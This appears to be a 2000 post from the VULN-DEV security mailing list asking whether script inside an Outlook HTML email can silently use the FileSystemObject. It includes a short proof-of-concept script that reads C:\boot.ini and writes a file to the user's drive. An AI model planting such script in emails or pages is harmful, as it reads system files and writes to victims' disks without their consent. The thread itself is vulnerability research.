Re: Outlook/HTML "proggie"

[mrousseau () LABCAL COM (Maxime Rousseau)]

I have tested this a little bit here and I have not been able to use the
FSO within an HTML message, unless the user explicitly clicks YES at the
prompt for unsafe activex or has his security set to allow unsafe
activex in html emails. Thats not so by default and if your 'CAN'
involves the user clicking the YES box, then its not all that great, you
might as well have a vbscript file attatched.

My point was (and still is) you cant use a FSO in an html eMail in a
transparent-to-user manner, sorry if i was unclear.

I used the following code in the html message and couldnt get it to run
transparently:

<script>
 var fso, bFile, nFile;
 fso = new ActiveXObject("Scripting.FileSystemObject");
 bFile = fso.OpenTextFile("C:\\boot.ini",1,0);
 document.write(bFile.ReadAll());
 nFile = fso.GetFolder("C:\\").CreateTextFile("spoitdemo.txt");
 nFile.Write("Hello, This text file was written by an eMail, it could
very well have been a virus!");
 nFile.Close();
 bFile.Close();
</script>

If you are able to do it, then by all means please send a sample!
If you get the "unsafe activex" box, then nevermind, this isnt usefull
very much.

M.

PS: Anyone has details on what was used in the herald's "hell virus"
story? as in, what objects?

!  -----Original Message-----
!  From: VULN-DEV ( Shelagh Pepper )
!  Sent: Thursday, June 01, 2000 9:00 AM
!  To: VULN-DEV () SECURITYFOCUS COM
!  Subject: Re: Outlook/HTML "proggie"
!
!  A script within the body of an email CAN access the
!  FileSystemObject if the
!  Scripting host is available. I will send a sample
!  separately. Most of the
!  code in my sample is directly lifted from the Microsoft
!  Scripting samples
!  on their website.
!
!  Shelagh